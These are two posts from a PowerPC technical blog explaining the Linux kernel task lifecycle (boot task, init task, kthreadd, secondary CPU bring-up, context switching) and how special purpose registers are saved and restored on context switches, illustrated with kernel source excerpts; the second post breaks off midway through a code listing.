Store Halfword Byte-Reverse Indexed

A Power Technical Blog

Lifecycle of a kernel task

Introduction

CPU cores are limited in number. Right now my computer tells me it's running around 500 processes, and I definitely do not have that many cores. The operating system's ability to virtualise work as independent 'executable units' and distribute them across the limited CPU pool is one of the foundations of modern computing.

The Linux kernel calls these virtual execution units tasks[1]. Each task encapsulates all the information the kernel needs to swap it in and out of running on a CPU core. This includes register state, memory mappings, open files, and any other resource that needs to be tied to a particular task. Nearly every work item in the kernel, including kernel background jobs and userspace processes, is handled by this unified task concept. The kernel uses a scheduler to determine when and where to run tasks according to some parameters, such as maximising throughput, minimising latency, or whatever other characteristics the user desires.

In this article, we'll dive into the lifecycle of a task in the kernel. This is a PowerPC blog, so any architecture specific (often shortened to 'arch') references are referring to PowerPC. To make the most out of this you should also have a copy of the kernel source open alongside you, to get a sense of what else is happening in the locations we discuss below. This article hyper-focuses on specific details of setting up tasks, leaving out a lot of possibly related content. Call stacks are provided to help orient yourself in many cases.

Booting

The kernel starts up with no concept of tasks; it just runs from the location the bootloader started it at (the __start function for PowerPC). The first idea of a task takes root in early_setup() where we initialise the PACA (I asked, but what this stands for is unclear). The PACA is used to hold a lot of core per-cpu information, such as the CPU index (for generic per-cpu variables) and a pointer to the active task.

__start()  // ASM implementation, defined in head_64.S
  __start_initialization_multiplatform()
    __after_prom_start()
      start_here_multiplatform()
        early_setup()   // switched to C here, defined in setup_64.c
          initialise_paca()
            new_paca->__current = &init_task;

We use the PACA to (among other things) hold a reference to the active task. The task we start with is the special init_task. To avoid ambiguity with the userspace init task we see later, I'll refer to init_task as the boot task from here onwards. This boot task is a statically defined instance of a task_struct that is the root of all future tasks. Its resources are likewise statically defined, typically named following the pattern init_*. We aren't taking advantage of the context switching capability of tasks this early in boot, we just need to look like we're a task for any initialisation code that cares. For now we continue to work as a single CPU core with a single task.
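
For a feel of what this looks like, here is an abridged sketch of that static definition; the real thing lives in init/init_task.c and fills in far more fields, with the exact initialisers varying by kernel version and config.

// Abridged sketch based on init/init_task.c -- not the full definition.
struct task_struct init_task = {
    .stack      = init_stack,    // statically allocated kernel stack
    .mm         = NULL,          // no userspace memory map
    .active_mm  = &init_mm,      // statically defined init_* resource
    .comm       = INIT_COMM,     // expands to "swapper", the name shown for PID 0
    // ... many more fields ...
};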

We continue on and reach start_kernel(), the generic entry point of the kernel once any arch specific bootstrapping is sufficiently complete. One of the first things we call here is setup_arch(), which continues any initialisation that still needs to occur. This is where we call smp_setup_pacas() to allocate a PACA for each CPU; these all get the boot task as well (all referencing the same init_task structure, not copies of it). Eventually they will be given their own independent tasks, but during most of boot we don't do anything on them so it doesn't matter for now.

The next point of interest back in start_kernel() is fork_init(). Here we create a task_struct allocator to serve any task creation requests. We also limit the number of tasks here, dynamically picking the limit based on the available memory, page size, and a fixed upper bound.

void __init fork_init(void) {
    // ...
    /* create a slab on which task_structs can be allocated */
    task_struct_whitelist(&useroffset, &usersize);
    task_struct_cachep = kmem_cache_create_usercopy("task_struct",
            arch_task_struct_size, align,
            SLAB_PANIC|SLAB_ACCOUNT,
            useroffset, usersize, NULL);
    // ...
}

At the end of start_kernel() we reach rest_init() (as in 'do the rest of the init'). In here we create our first two dynamically allocated tasks: the init task (not to be confused with init_task, which we are calling the boot task), and the kthreadd task (with the double 'd'). The init task is (eventually) the userspace init process. We create it first so that it gets PID 1, which a number of things in the kernel and in userspace rely on[2]. The kthreadd task provides an asynchronous creation mechanism for kthreads: callers append their thread parameters to a dedicated list, and the kthreadd task spawns any entries on the list whenever it gets scheduled. Creating these tasks automatically puts them on the scheduler run queue, and if preemption is enabled they may even start running right away.

// init/main.c

noinline void __ref __noreturn rest_init(void)
{
    struct task_struct *tsk;
    int pid;

    rcu_scheduler_starting();
    /*
     * We need to spawn init first so that it obtains pid 1, however
     * the init task will end up wanting to create kthreads, which, if
     * we schedule it before we create kthreadd, will OOPS.
     */
    pid = user_mode_thread(kernel_init, NULL, CLONE_FS);
    /*
     * Pin init on the boot CPU. Task migration is not properly working
     * until sched_init_smp() has been run. It will set the allowed
     * CPUs for init to the non isolated CPUs.
     */
    rcu_read_lock();
    tsk = find_task_by_pid_ns(pid, &init_pid_ns);
    tsk->flags |= PF_NO_SETAFFINITY;
    set_cpus_allowed_ptr(tsk, cpumask_of(smp_processor_id()));
    rcu_read_unlock();

    numa_default_policy();
    pid = kernel_thread(kthreadd, NULL, NULL, CLONE_FS | CLONE_FILES);
    rcu_read_lock();
    kthreadd_task = find_task_by_pid_ns(pid, &init_pid_ns);
    rcu_read_unlock();

    /*
     * Enable might_sleep() and smp_processor_id() checks.
     * They cannot be enabled earlier because with CONFIG_PREEMPTION=y
     * kernel_thread() would trigger might_sleep() splats. With
     * CONFIG_PREEMPT_VOLUNTARY=y the init task might have scheduled
     * already, but it's stuck on the kthreadd_done completion.
     */
    system_state = SYSTEM_SCHEDULING;

    complete(&kthreadd_done);

    /*
     * The boot idle thread must execute schedule()
     * at least once to get things moving:
     */
    schedule_preempt_disabled();
    /* Call into cpu_idle with preempt disabled */
    cpu_startup_entry(CPUHP_ONLINE);
}

After this, the boot task calls cpu_startup_entry(), which transforms it into the idle task for the boot CPU and enters the idle loop. We're now almost fully task driven, and our journey picks back up inside of the init task.

Bonus tip: when looking at the kernel boot console, you can tell which messages were printed by the boot task vs the init task. The boot task (init_task) has PID 0, so its lines are tagged T0. The init task has PID 1, so it appears as T1.

[    0.039772][    T0] printk: legacy console [hvc0] enabled
...
[   28.272167][    T1] Run /init as init process

The init task

When we created the init task, we set the entry point to be the kernel_init() function. Execution simply begins from here[3] once it gets woken up for the first time. The very first thing we do is wait[4] for the kthreadd task to be created: if we were to try and create a kthread before this, then when the kthread creation mechanism tries to wake up the kthreadd task it would be using an uninitialised pointer, causing an oops. To prevent this, the init task waits on a completion object that the boot task marks completed after creating kthreadd. We could technically avoid this synchronisation altogether just by creating kthreadd first, but then the init task wouldn't have PID 1.
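
Stripped of everything else, the handshake between the two tasks uses the kernel's completion API and looks roughly like this:

// Sketch of the synchronisation only; see init/main.c for the real code.
static DECLARE_COMPLETION(kthreadd_done);

// Init task, before it creates any kthreads:
wait_for_completion(&kthreadd_done);   // sleep until the boot task signals us

// Boot task, in rest_init() after spawning kthreadd (shown above):
complete(&kthreadd_done);              // wake any waiters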

The rest of the init task wraps up the initialisation stage as a whole. Mostly it moves the system into the 'running' state after freeing any memory marked as for initialisation only (set by __init annotations). Once fully initialised and running, the init task attempts to execute the userspace init program.

    if (ramdisk_execute_command) {
        ret = run_init_process(ramdisk_execute_command);
        if (!ret)
            return 0;
        pr_err("Failed to execute %s (error %d)\n",
               ramdisk_execute_command, ret);
    }

    if (execute_command) {
        ret = run_init_process(execute_command);
        if (!ret)
            return 0;
        panic("Requested init %s failed (error %d).",
              execute_command, ret);
    }

    if (CONFIG_DEFAULT_INIT[0] != '\0') {
        ret = run_init_process(CONFIG_DEFAULT_INIT);
        if (ret)
            pr_err("Default init %s failed (error %d)\n",
                   CONFIG_DEFAULT_INIT, ret);
        else
            return 0;
    }

    if (!try_to_run_init_process("/sbin/init") ||
        !try_to_run_init_process("/etc/init") ||
        !try_to_run_init_process("/bin/init") ||
        !try_to_run_init_process("/bin/sh"))
        return 0;

    panic("No working init found.  Try passing init= option to kernel. "
          "See Linux Documentation/admin-guide/init.rst for guidance.");

What file the init process is loaded from is determined by a combination of the system's filesystem, kernel boot arguments, and some default fallbacks. The locations it will attempt, in order, are:

  1. Ramdisk file set by rdinit= boot command line parameter, with default path /init. An initcall run earlier searches the boot arguments for rdinit and initialises ramdisk_execute_command with it. If the ramdisk does not contain the requested file, then the kernel will attempt to automatically mount the root device and use it for the subsequent checks.
  2. File set by init= boot command line parameter. Like with rdinit, the execute_command variable is initialised by an early initcall looking for init in the boot arguments.
  3. /sbin/init
  4. /etc/init
  5. /bin/init
  6. /bin/sh

Should none of these work, the kernel just panics. Which seems fair.

Aside: secondary processors

Until now we've focused on the boot CPU. While the utility of a task still applies to a uniprocessor system (perhaps even more so than one with hardware parallelism), a nice benefit of encapsulating all the execution state into a data structure is the ability to load the task onto any other compatible processor on the system. But before we can start scheduling on other CPU cores, we need to bring them online and initialise them to a state ready for the scheduler.

On the pSeries platform, the secondary CPUs are held by the firmware until explicitly released by the guest. Early in boot, the boot CPU (not task! We don't have tasks yet) will iterate the list of held secondary processors and release them one by one to the __secondary_hold function. As each starts executing __secondary_hold, it writes a value to the __secondary_hold_acknowledge variable that the boot CPU is watching. The secondary processor then immediately starts spinning on __secondary_hold_spinloop, waiting for it to become non-zero, while the boot CPU moves on to the next processor.

// Boot CPU releasing the coprocessors from firmware

__start()
  __start_initialization_multiplatform()
    __boot_from_prom()
      prom_init()    // switched to C here
        prom_hold_cpus()
          // secondary_hold is alias for __secondary_hold assembly function
          call_prom("start-cpu", ..., secondary_hold, ...);  // on each coprocessor

Once every coprocessor is confirmed to be spinning on __secondary_hold_spinloop, the boot CPU continues with its boot sequence. When the boot task reaches setup_arch() (called early in start_kernel(), as above), it invokes smp_release_cpus(), which writes the desired coprocessor entry point address to __secondary_hold_spinloop. All the spinning coprocessors now see this value and jump to it. This entry point, generic_secondary_smp_init(), sets up the coprocessor's PACA, performs some machine specific initialisation if cur_cpu_spec->cpu_restore is set[5], atomically decrements a spinning_secondaries variable, and starts spinning once again until further notice. This time it waits on the PACA field cpu_start, so we can start coprocessors individually.
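
The hold/release handshake itself is assembly in head_64.S, but rendered as C it looks roughly like the following (the function shapes here are illustrative, not the real signatures).

// Illustrative C rendering only; the real __secondary_hold is assembly
// running with the MMU off, and smp_release_cpus() lives in setup_64.c.
extern unsigned long __secondary_hold_spinloop;
extern unsigned long __secondary_hold_acknowledge;
extern void generic_secondary_smp_init(void);

// Each secondary, once firmware drops it into __secondary_hold:
void secondary_hold(unsigned long cpu_id)
{
    __secondary_hold_acknowledge = cpu_id;   // tell the boot CPU we arrived
    while (!__secondary_hold_spinloop)
        ;                                    // spin until released
    // jump to the published entry point (generic_secondary_smp_init)
    ((void (*)(void))__secondary_hold_spinloop)();
}

// Boot task: publish the entry point, releasing every spinning secondary
void smp_release_cpus(void)
{
    __secondary_hold_spinloop = (unsigned long)generic_secondary_smp_init;
}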

We leave the coprocessors here for a while, until the init task calls kernel_init_freeable(). This function is used for any initialisation required after kthreads are running, but before all the __init sections are dropped. The setup relevant to coprocessors is the call to smp_init(). Here we fork the current task (the init task) once for each coprocessor with idle_threads_init(). We then call bringup_nonboot_cpus() to make each coprocessor start scheduling.

The exact code paths here are both deep and indirect, so here's the interesting part of the call tree for the pSeries platform to help guide you through the code.

// In the init task

smp_init()
  idle_threads_init()     // create idle task for each coprocessor
  bringup_nonboot_cpus()  // make each coprocessor enter the idle loop
    cpuhp_bringup_mask()
      cpu_up()
        _cpu_up()
          cpuhp_up_callbacks()  // invokes the CPUHP_BRINGUP_CPU .startup.single function
            bringup_cpu()
              __cpu_up()
                cpu_idle_thread_init()  // sets CPU's task in PACA to its idle task
                smp_ops->prepare_cpu()  // on pSeries inits XIVE if in use
                smp_ops->kick_cpu()     // indirect call to smp_pSeries_kick_cpu()
                  smp_pSeries_kick_cpu()
                    paca_ptrs[nr]->cpu_start = 1  // the coprocessor was spinning on this value

Interestingly, the entry point declared when cloning the init task for the coprocessors is never used. This is because the coprocessors never get woken up from the hand-crafted init state the way new tasks normally would. Instead they are already executing a code path, and so when they next yield they will just clobber the entry point and other registers with their actually running task state.

Transitioning the init task to userspace

The last remaining job of the kernel side of the init task is to actually load in and execute the selected userspace program. It's not like we can just call the userspace entry point though: we need to be a little creative here.

As alluded to above, when we create a task, copy_thread() doesn't set the provided entry point directly: it instead installs a small shim that is actually used when the new task eventually gets woken up. The particular shim it uses is determined by whether the task is a kthread or not.

Both kinds of shim expect the requested entry point to be passed in a specific non-volatile register; the kthread shim, after some minor bookkeeping, basically just invokes it. A kthread should never return directly, so the shim traps if this happens.

_GLOBAL(start_kernel_thread)
    bl  CFUNC(schedule_tail)
    mtctr   r14
    mr  r3,r15
#ifdef CONFIG_PPC64_ELF_ABI_V2
    mr  r12,r14
#endif
    bctrl
    /*
     * This must not return. We actually want to BUG here, not WARN,
     * because BUG will exit the process which is what the kernel thread
     * should have done, which may give some hope of continuing.
     */
100:    trap
    EMIT_BUG_ENTRY 100b,__FILE__,__LINE__,0

But the init task isn't a kthread. We passed a kernel entrypoint to copy_thread() but did not set the kthread flag, so copy_thread() inferred that this means the task will eventually run in userspace. This makes it use the ret_from_kernel_user_thread() shim.

_GLOBAL(ret_from_kernel_user_thread)
    bl  CFUNC(schedule_tail)
    mtctr   r14
    mr  r3,r15
#ifdef CONFIG_PPC64_ELF_ABI_V2
    mr  r12,r14
#endif
    bctrl
    li  r3,0
    /*
     * It does not matter whether this returns via the scv or sc path
     * because it returns as execve() and therefore has no calling ABI
     * (i.e., it sets registers according to the exec()ed entry point).
     */
    b   .Lsyscall_exit

We start off identically to a kthread, except here we expect the task to return. This is the key: when the init task wants to transition to userspace, it sets up the stack frame as if we were serving a syscall. It then returns, which runs the syscall exit procedure that culminates in an rfid to userspace.

The actual setting up of the syscall frame is handled by the (try_)run_init_process() function. The interesting call path goes like

run_init_process()
  kernel_execve()
    bprm_execve()
      exec_binprm()
        search_binary_handler()
          list_for_each_entry(fmt, &formats, lh)
            retval = fmt->load_binary(bprm);

The outer few calls mainly handle checking prerequisites and bookkeeping. The exec_binprm() call also handles shebang redirection, allowing up to 5 levels of interpreter. At each level it invokes search_binary_handler(), which attempts to find a handler for the program file's format. Contrary to the name, the searcher will also immediately try to load the file if it finds an appropriate handler. It's this call to load_binary (dispatched to whatever handler was found) that sets up our userspace execution context, including the syscall return state.
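
As a concrete example of what lives on that formats list, the ELF loader registers itself roughly like this (abridged from fs/binfmt_elf.c):

// Abridged from fs/binfmt_elf.c; load_binary is the callback that
// search_binary_handler() ends up dispatching to.
static struct linux_binfmt elf_format = {
    .module       = THIS_MODULE,
    .load_binary  = load_elf_binary,    // builds the new userspace context
    .load_shlib   = load_elf_library,
    .core_dump    = elf_core_dump,
    .min_coredump = ELF_EXEC_PAGESIZE,
};

static int __init init_elf_binfmt(void)
{
    register_binfmt(&elf_format);
    return 0;
}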

All that's left to do here is return 0 all the way up the chain, which you'll see results in the init task returning to the shim that performs the syscall return sequence to userspace. The init task is now fully userspace.

Creating other tasks

It feels like we've spent a lot of time discussing the init task. What about all the other tasks?

It turns out that the creation of the init task is very similar to any other task. All tasks are clones of the task that created them (except the statically defined init_task). Note 'clone' is being used in a loose sense here: it's not an exact image of the parent. There's a configuration parameter that determines which components are shared, and which are made into independent copies. The implementation may also just decide to change some things that don't make sense to duplicate, such as the task ID to distinguish it from the parent.

As we saw earlier, kthreads are created indirectly through a global list and kthreadd daemon task that does the actual cloning. This has two benefits: allowing asynchronous task creation from atomic contexts, and ensuring all kthreads inherit a 'clean' task context, instead of whatever was active at the time.

Userspace task creation, beyond the init task, is driven by the userspace process invoking the fork() and clone() family of syscalls. Both of these are light wrappers over the kernel_clone() function, which we used earlier for the creation of the init task and kthreadd.

When a task runs a syscall in the exec() family, it doesn't create a new task. It instead hits the same code path as when we tried to run the userspace init program, where it loads in the context as defined by the program file into the current task and returns from the syscall (legitimately this time).
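
From userspace this is the familiar fork-then-exec pattern; here's a small illustration (the exec replaces the calling task's program without ever creating a new task):

// Userspace illustration: fork() clones the current task, execl()
// replaces the calling task's program image in place.
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    pid_t pid = fork();
    if (pid == 0) {
        // child: still the same task, now loading a new program
        execl("/bin/echo", "echo", "hello from the child task", (char *)NULL);
        perror("execl");        // only reached if the exec failed
        return 1;
    }
    waitpid(pid, NULL, 0);      // parent: wait for the child task to exit
    return 0;
}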

Context switching

The last piece of the puzzle (as far as this article goes, at least!) is how tasks are switched in and out, and some of the rules around when it can and can't happen. Once the init and kthreadd tasks are created, the boot task calls cpu_startup_entry(CPUHP_ONLINE), and by the time the coprocessors are brought online they have been released to call it too. Their tasks are repurposed as 'idle tasks', which run when no other task is runnable. Each idle task spins on a check for pending work, entering an idle state on each iteration until it sees runnable tasks. It then calls __schedule() in a loop (again conditional on pending tasks existing), and returns to the idle loop once everything runnable at that moment has been handled.
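
The shape of that loop, heavily simplified from cpu_startup_entry() and do_idle() in kernel/sched/idle.c, is roughly:

// Heavily simplified sketch; the real do_idle() also deals with cpuidle
// governors, RCU, CPU hotplug and more.
void cpu_startup_entry(enum cpuhp_state state)
{
    for (;;) {
        while (!need_resched())
            arch_cpu_idle();    // enter a low power wait until work arrives
        schedule_idle();        // let the scheduler run the pending tasks
    }
}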

The __schedule() function is the main guts of the scheduler, which until now has seemed like some nebulous controller governing when and where our tasks run. In reality it isn't one isolated part of the system, but a function that a task calls when it decides to yield to any other waiting tasks. It starts by deciding which pending task should run next (a whole can of worms right there), and then executes context_switch() if that differs from the current task. context_switch() is the point where the current task starts to change. Specifically, you can trace the changing of current (i.e., the PACA being updated with a new task pointer) to the following path

context_switch()
  switch_to()
    __switch_to()
      _switch()
        do_switch_64
          std   r6,PACACURRENT(r13)

One interesting consequence of tasks calling context_switch() is that the previous task is 'suspended'[6] right where it saves its registers and puts in the new task's values. When it is woken up again at some point in the future it resumes right where it left off. So when you are reading the __switch_to() implementation, you are actually looking at two different tasks in the same function.

But it gets even weirder: while tasks that put themselves to sleep here wake up inside of _switch(), new tasks being woken up for the first time start at a completely different location! So not only is the task changing, the _switch() call might not even return back to __switch_to()!

Conclusion

And there you have it, everything[citation needed] you could ever need to know when getting started with tasks. Will you need to know this specifically? Hard to say. But hopefully it at least provides some useful pointers for understanding the execution model of the kernel.

Questions

The following are some questions you might have (read: I had).

Do we change the task struct when serving a syscall?

No, the task struct stays the same. The task struct describes a userspace task, but it remains the active task while the kernel serves syscalls or similar actions on behalf of that task's userspace execution.

Thanks to address space quadrants we don't even need to change the active memory mapping: upon entry to the kernel we automatically start using the PID 0 mapping.

Where does a task get allocated a PID?

Software PIDs are allocated when spawning a new process. However, if the new process shares memory mappings with another (as threads do), it may not be allocated a new hardware PID. The hardware PID, meaning the PID used for virtual memory translations, is actually a property of the memory mapping struct (mm_struct). You can find a hardware PID being allocated when a new mm_struct is created, which may or may not occur depending on the task clone parameters.

How can the fork and exec syscalls be hooked into for arch specific handling?

Fork (and clone) will always invoke copy_thread(). The exec call will invoke start_thread() when loading a binary file. Any other kind of file (script, binfmt-misc) will eventually require some form of binary file to load/bootstrap it, so start_thread() should work for your purposes. You can also use arch_setup_new_exec() for a cleaner hook into exec.

The task context of the calls is fairly predictable: current in copy_thread() refers to the parent because we are still in the middle of copying it. For start_thread(), current refers to the task that is going to be the new program because it is just configuring itself.

Where do exceptions/interrupts fit in?

When a hardware interrupt triggers it just stops whatever it was doing and dumps us at the corresponding exception handler. Our current value still points to whatever task is active (restoring the PACA is done very early). If we were in userspace (MSR[PR] was 1) we consider ourselves to be in 'process context'. This is, in some sense, the default state in the kernel. We are able to sleep (i.e., invoke the scheduler and swap ourselves out), take locks, and generally do anything you might like to do in the kernel. This is in contrast to 'atomic context', where certain parts of the kernel expect to be executed without interruption or sleeping.

However, we are a bit more restricted if we arrived at an interrupt from supervisor mode. For example, we don't know if we interrupted an atomic context, so we can't safely do anything that might cause sleep. This is why in some interrupt handlers like do_program_check() we have to check user_mode(regs) before we can read a userspace instruction[7].


  1. Read more on tasks in my previous post 

  2. One example of the init task being special is that the kernel will not allow its process to be killed. It must always have at least one thread. 

  3. Well, it actually begins at a small assembly shim, but close enough for now. 

  4. The wait mechanism itself is an interesting example of interacting with the scheduler. Starting with a common struct completion object, the waiting task registers itself as awaiting the object to complete. Specifically, it adds its task handle to a queue on the completion object. It then loops calling schedule(), yielding itself to other tasks, until the completion object is flagged as done. Somewhere else another task marks the completion object as completed. As part of this, the task marking the completion tries to wake up any task that has registered itself as waiting earlier. 

  5. The cur_cpu_spec->cpu_restore machine specific initialisation is based on the machine that got selected in arch/powerpc/kernel/cpu_specs_book3s_64.h. This is where the __restore_cpu_* family of functions might be called, which mostly initialise certain SPRs to sane values. 

  6. Don't forget that the entire concept of tasks is made up by the kernel: from the hardware's point of view we haven't done anything interesting, just changed some registers. 

  7. The issue with reading a userspace instruction is that the page access may require the page be faulted in, which can sleep. There is a mechanism to disable the page fault handler specifically, but then we might not be able to read the instruction. 

Context switching SPRs on PowerPC

Introduction

This post is a dive (well, more of a meander) through some of the PowerPC specific aspects of context switching, especially on the Special Purpose Register (SPR) handling. It was motivated by my recent work on adding kernel support for a hardware feature that interfaces with software through an SPR.

What's a context anyway?

The context we are concerned about in this post is the task context. That's all the state that makes up a 'task' in the eyes of the kernel. These are resources like registers, the thread ID, memory mappings, and so on. The kernel is able to save and restore this state into a task context data structure, allowing it to run arbitrarily many tasks concurrently despite the limited number of CPU cores available. It can simply save these resource values when switching out a task, and replace the CPU state with the values stored by the task being switched in.

Unless you're a long time kernel developer, chances are you haven't heard of or looked too closely at a 'task' in the kernel. The next section gives a rundown of tasks and processes, giving you a better frame of reference for the later context switching discussion.

Processes, threads, and tasks

To understand the difference between these three concepts, we'll start with how the kernel sees everything: tasks. Tasks are the kernel's view of an 'executable unit' (think single threaded process), a self contained thread of execution that has a beginning, performs some operations, then (maybe) ends. They are the indivisible building blocks upon which multitasking and multithreading can be built, where multiple tasks run independently, or optionally communicate in some manner to distribute work.

The kernel represents each task with a struct task_struct. This is an enormous struct (around 10KB) of all the pieces of data people have wanted to associate with a particular unit of execution over the decades. The architecture specific state of the task is stored in a one-to-one mapped struct thread_struct, available through the thread member in the task_struct. The name 'thread' when referring to this structure on a task should not be confused with the concept of a thread we'll visit shortly.
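
The relationship looks roughly like this (see include/linux/sched.h and arch/powerpc/include/asm/processor.h for the real definitions):

// Abridged sketch; the real task_struct has hundreds of members.
struct task_struct {
    // scheduling state, PIDs, mm pointer, open files, signal state, ...
    struct thread_struct thread;   // arch specific state (saved registers etc.)
};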

A task is highly flexible in terms of resource sharing. Many resources, such as the memory mappings and file descriptor tables, are held through reference counted handles to a backing data structure. This makes it easy to mix-and-match sharing of different components between other tasks.

Approaching tasks from the point of view of userspace, here we think of execution in terms of processes and threads. If you want an 'executable unit' in userspace, you are understood to be talking about a process or thread. These are implemented as tasks by the kernel though; a detail like running in userspace mode on the CPU is just another property stored in the task struct.

For an example of how tasks can either copy or share their parent's resources, consider what happens when creating a child process with the fork() syscall. The child will share memory and open files at the time of the fork, but further changes to these resources in either process are not visible to the other. At the time of the fork, the kernel simply duplicates the parent task and replaces relevant resources with copies of the parent's values[1].
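
A quick userspace demonstration of that isolation:

// After fork(), writes in the child are not visible to the parent, even
// though the memory started out as an identical (copy-on-write) image.
#include <stdio.h>
#include <sys/wait.h>
#include <unistd.h>

int counter = 1;

int main(void)
{
    if (fork() == 0) {
        counter = 100;          // modifies the child's private copy only
        return 0;
    }
    wait(NULL);
    printf("%d\n", counter);    // parent still prints 1
    return 0;
}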

It is often useful to have multiple processes share things like memory and open files though: this is what threads provide. A process can be 'split' into multiple threads[2], each backed by its own task. These threads can share resources that are normally isolated between processes.

This thread creation mechanism is very similar to process creation. The clone() family of syscalls allows creating a new thread that shares resources with the thread that cloned itself. Exactly which resources get shared between threads is highly configurable, thanks to the kernel's task representation; see the clone(2) manpage for all the options (and the userspace sketch after the kernel snippet below). Creating a process can be thought of as creating a thread where nothing is shared. In fact, that's how fork() is implemented under the hood: a thin wrapper around clone()'s implementation where nothing is shared, including the process group ID.

// kernel/fork.c  (approximately)

SYSCALL_DEFINE0(fork)
{
    struct kernel_clone_args args = {
        .exit_signal = SIGCHLD,
    };

    return kernel_clone(&args);
}

SYSCALL_DEFINE2(clone3, struct clone_args __user *, uargs, size_t, size)
{
    int err;

    struct kernel_clone_args kargs;
    pid_t set_tid[MAX_PID_NS_LEVEL];

    kargs.set_tid = set_tid;

    err = copy_clone_args_from_user(&kargs, uargs, size);
    if (err)
        return err;

    if (!clone3_args_valid(&kargs))
        return -EINVAL;

    return kernel_clone(&kargs);
}

pid_t kernel_clone(struct kernel_clone_args *args) {
    // do the clone
}
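
And seen from userspace, the same configurability shows up in the clone() wrapper. A hedged sketch that shares just the address space and file descriptor table:

// Userspace sketch using the glibc clone() wrapper. CLONE_VM | CLONE_FILES
// shares the memory mappings and file descriptor table with the parent.
#define _GNU_SOURCE
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

static int shared_value;

static int worker(void *arg)
{
    shared_value = 42;   // visible to the parent because the VM is shared
    return 0;
}

int main(void)
{
    size_t stack_size = 64 * 1024;
    char *stack = malloc(stack_size);

    pid_t pid = clone(worker, stack + stack_size,
                      CLONE_VM | CLONE_FILES | SIGCHLD, NULL);
    waitpid(pid, NULL, 0);
    printf("%d\n", shared_value);   // prints 42
    free(stack);
    return 0;
}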

That's about it for the differences in processes, threads, and tasks from the point of view of the kernel. A key takeaway here is that, while you will often see processes and threads discussed with regards to userspace programs, there is very little difference under the hood. To the kernel, it's all just tasks with various degrees of shared resources.

Special Purpose Registers (SPRs)

As a final prerequisite, in this section we look at SPRs. The SPRs are CPU registers that, to put it simply, provide a catch-all set of functionalities for interacting with the CPU. They tend to affect or reflect the CPU state in various ways, though are very diverse in behaviour and purpose. Some SPRs, such as the Link Register (LR), are similar to GPRs in that you can read and write arbitrary data. They might have special interactions with certain instructions, such as the LR value being used as the branch target address of the blr (branch to LR) instruction. Others might provide a way to view or interact with more fundamental CPU state, such as the Authority Mask Register (AMR) which the kernel uses to disable accesses to userspace memory while in supervisor mode.

Most SPRs are per-CPU, much like GPRs. And, like GPRs, it makes sense for many of them to be tracked per-task, so that we can conceptually treat them as a per-task resource. But, depending on the particular SPR, writing to them can be slow. The heavily used data-like SPRs, such as LR and CTR (Count Register), can be renamed by the hardware, making them comparable to GPRs in terms of read/write performance. But others that affect the state of large parts of the CPU core, such as the Data Stream Control Register (DSCR), can take a while for the effects of changing them to be applied. Well, not so slow that you will notice the occasional access, but there's one case in the kernel that occurs extremely often and needs to change a lot of these SPRs to support our per-task abstraction: context switches.
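
For reference, kernel code reads and writes SPRs through the mfspr()/mtspr() helpers, for example:

// SPRN_* numbers and the mfspr()/mtspr() helpers come from
// arch/powerpc/include/asm/reg.h.
unsigned long dscr = mfspr(SPRN_DSCR);   // move from SPR: read the DSCR
mtspr(SPRN_DSCR, dscr);                  // move to SPR: write a value back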

Anatomy of a context switch

Here we'll explore the actual function behind performing a context switch. We're interested in the SPR handling especially, because that's going to inform how we start tracking a new SPR on a per-task basis, so we'll be skimming over a lot of unrelated aspects.

We start our investigation in the aptly named context_switch() function in kernel/sched/core.c.

// kernel/sched/core.c

/*
 * context_switch - switch to the new MM and the new thread's register state.
 */
static __always_inline struct rq *
context_switch(struct rq *rq, struct task_struct *prev,
               struct task_struct *next, struct rq_flags *rf)

Along with some scheduling metadata, we see it takes a previous task and a next task. As we discussed above, the struct task_struct type describes a unit of execution that defines (among other things) how to set up the state of the CPU.

This function starts off with some generic preparation and memory context changes[3], before getting to the meat of the function with switch_to(prev, next, prev). This switch_to() call is actually a macro, which unwraps to a call to __switch_to(). It's also at this point that we enter the architecture specific implementation.

// arch/powerpc/include/asm/switch_to.h  (switch_to)
// arch/powerpc/kernel/process.c         (__switch_to)

struct task_struct *__switch_to(struct task_struct *prev,
                                struct task_struct *new)

Here we've only got our previous and next tasks to work with, focusing on just doing the switch.

Once again, we'll skip through most of the implementation. You'll see a few odds and ends being handled: asserting we won't be taking any interrupts, handling some TLB flushing, a copy-paste edge case, and some breakpoint handling on certain platforms. Then we reach what we were looking for: save_sprs(). The relevant section looks something like the following

    /*
     * We need to save SPRs before treclaim/trecheckpoint as these will
     * change a number of them.
     */
    save_sprs(&prev->thread);

    /* Save FPU, Altivec, VSX and SPE state */
    giveup_all(prev);

    __switch_to_tm(prev, new);

    if (!radix_enabled()) {
        /*
         * We can't take a PMU exception inside _switch() since there
         * is a window where the kernel stack SLB and the kernel stack
         * are out of sync. Hard disable here.
         */
        hard_irq_disable();
    }

    /*
     * Call restore_sprs() and set_return_regs_changed() before calling
     * _switch(). If we move it after _switch() then we miss out on calling
     * it for new tasks. The reason for this is we manually create a stack
     * frame for new tasks that directly returns through ret_from_fork() or
     * ret_from_kernel_thread(). See copy_thread() for details.
     */
    restore_sprs(old_thread, new_thread);

The save_sprs() function itself does the following to its prev->thread argument.

// arch/powerpc/kernel/process.c

static inline void save_sprs(struct thread_struct *t)
{
#ifdef CONFIG_ALTIVEC
    if (cpu_has_feature(CPU_FTR_ALTIVEC))
        t->vrsave = mfspr(SPRN_VRSAVE);
#endif
#ifdef CONFIG_SPE
    if (cpu_has_feature(CPU_FTR_SPE))
        t->spefscr = mfspr(SPRN_SPEFSCR);
#endif
#ifdef CONFIG_PPC_BOOK3S_64
    if (cpu_has_feature(CPU_FTR_DSCR))
        t->dscr = mfspr(SPRN_DSCR);

    if (cpu_has_feature(CPU_FTR_ARCH_207S)) {
        t->bescr = mfspr(SPRN_BESCR);
        t->ebbhr = mfspr(SPRN_EBBHR);
        t->ebbrr = mfspr(SPRN_EBBRR);

        t->fscr = mfspr(SPRN_FSCR);

        /*
         * Note that the TAR is not available for use in the kernel.
         * (To provide this, the TAR should be backed up/restored on
         * exception entry/exit instead, and be in pt_regs.  FIXME,
         * this should be in pt_regs anyway (for debug).)
         */
        t->tar = mfspr(SPRN_TAR);
    }

    if (cpu_has_feature(CPU_FTR_DEXCR_NPHIE))
        t->hashkeyr = mfspr(SPRN_HASHKEYR);
#endif
}

Later, we set up the SPRs of the new task with restore_sprs():

// arch/powerpc/kernel/process.c

static inline void restore_sprs(struct thread_struct *old_thread,
                struct thread_struct *new_thread)
{
#ifdef CONFIG_ALTIVEC
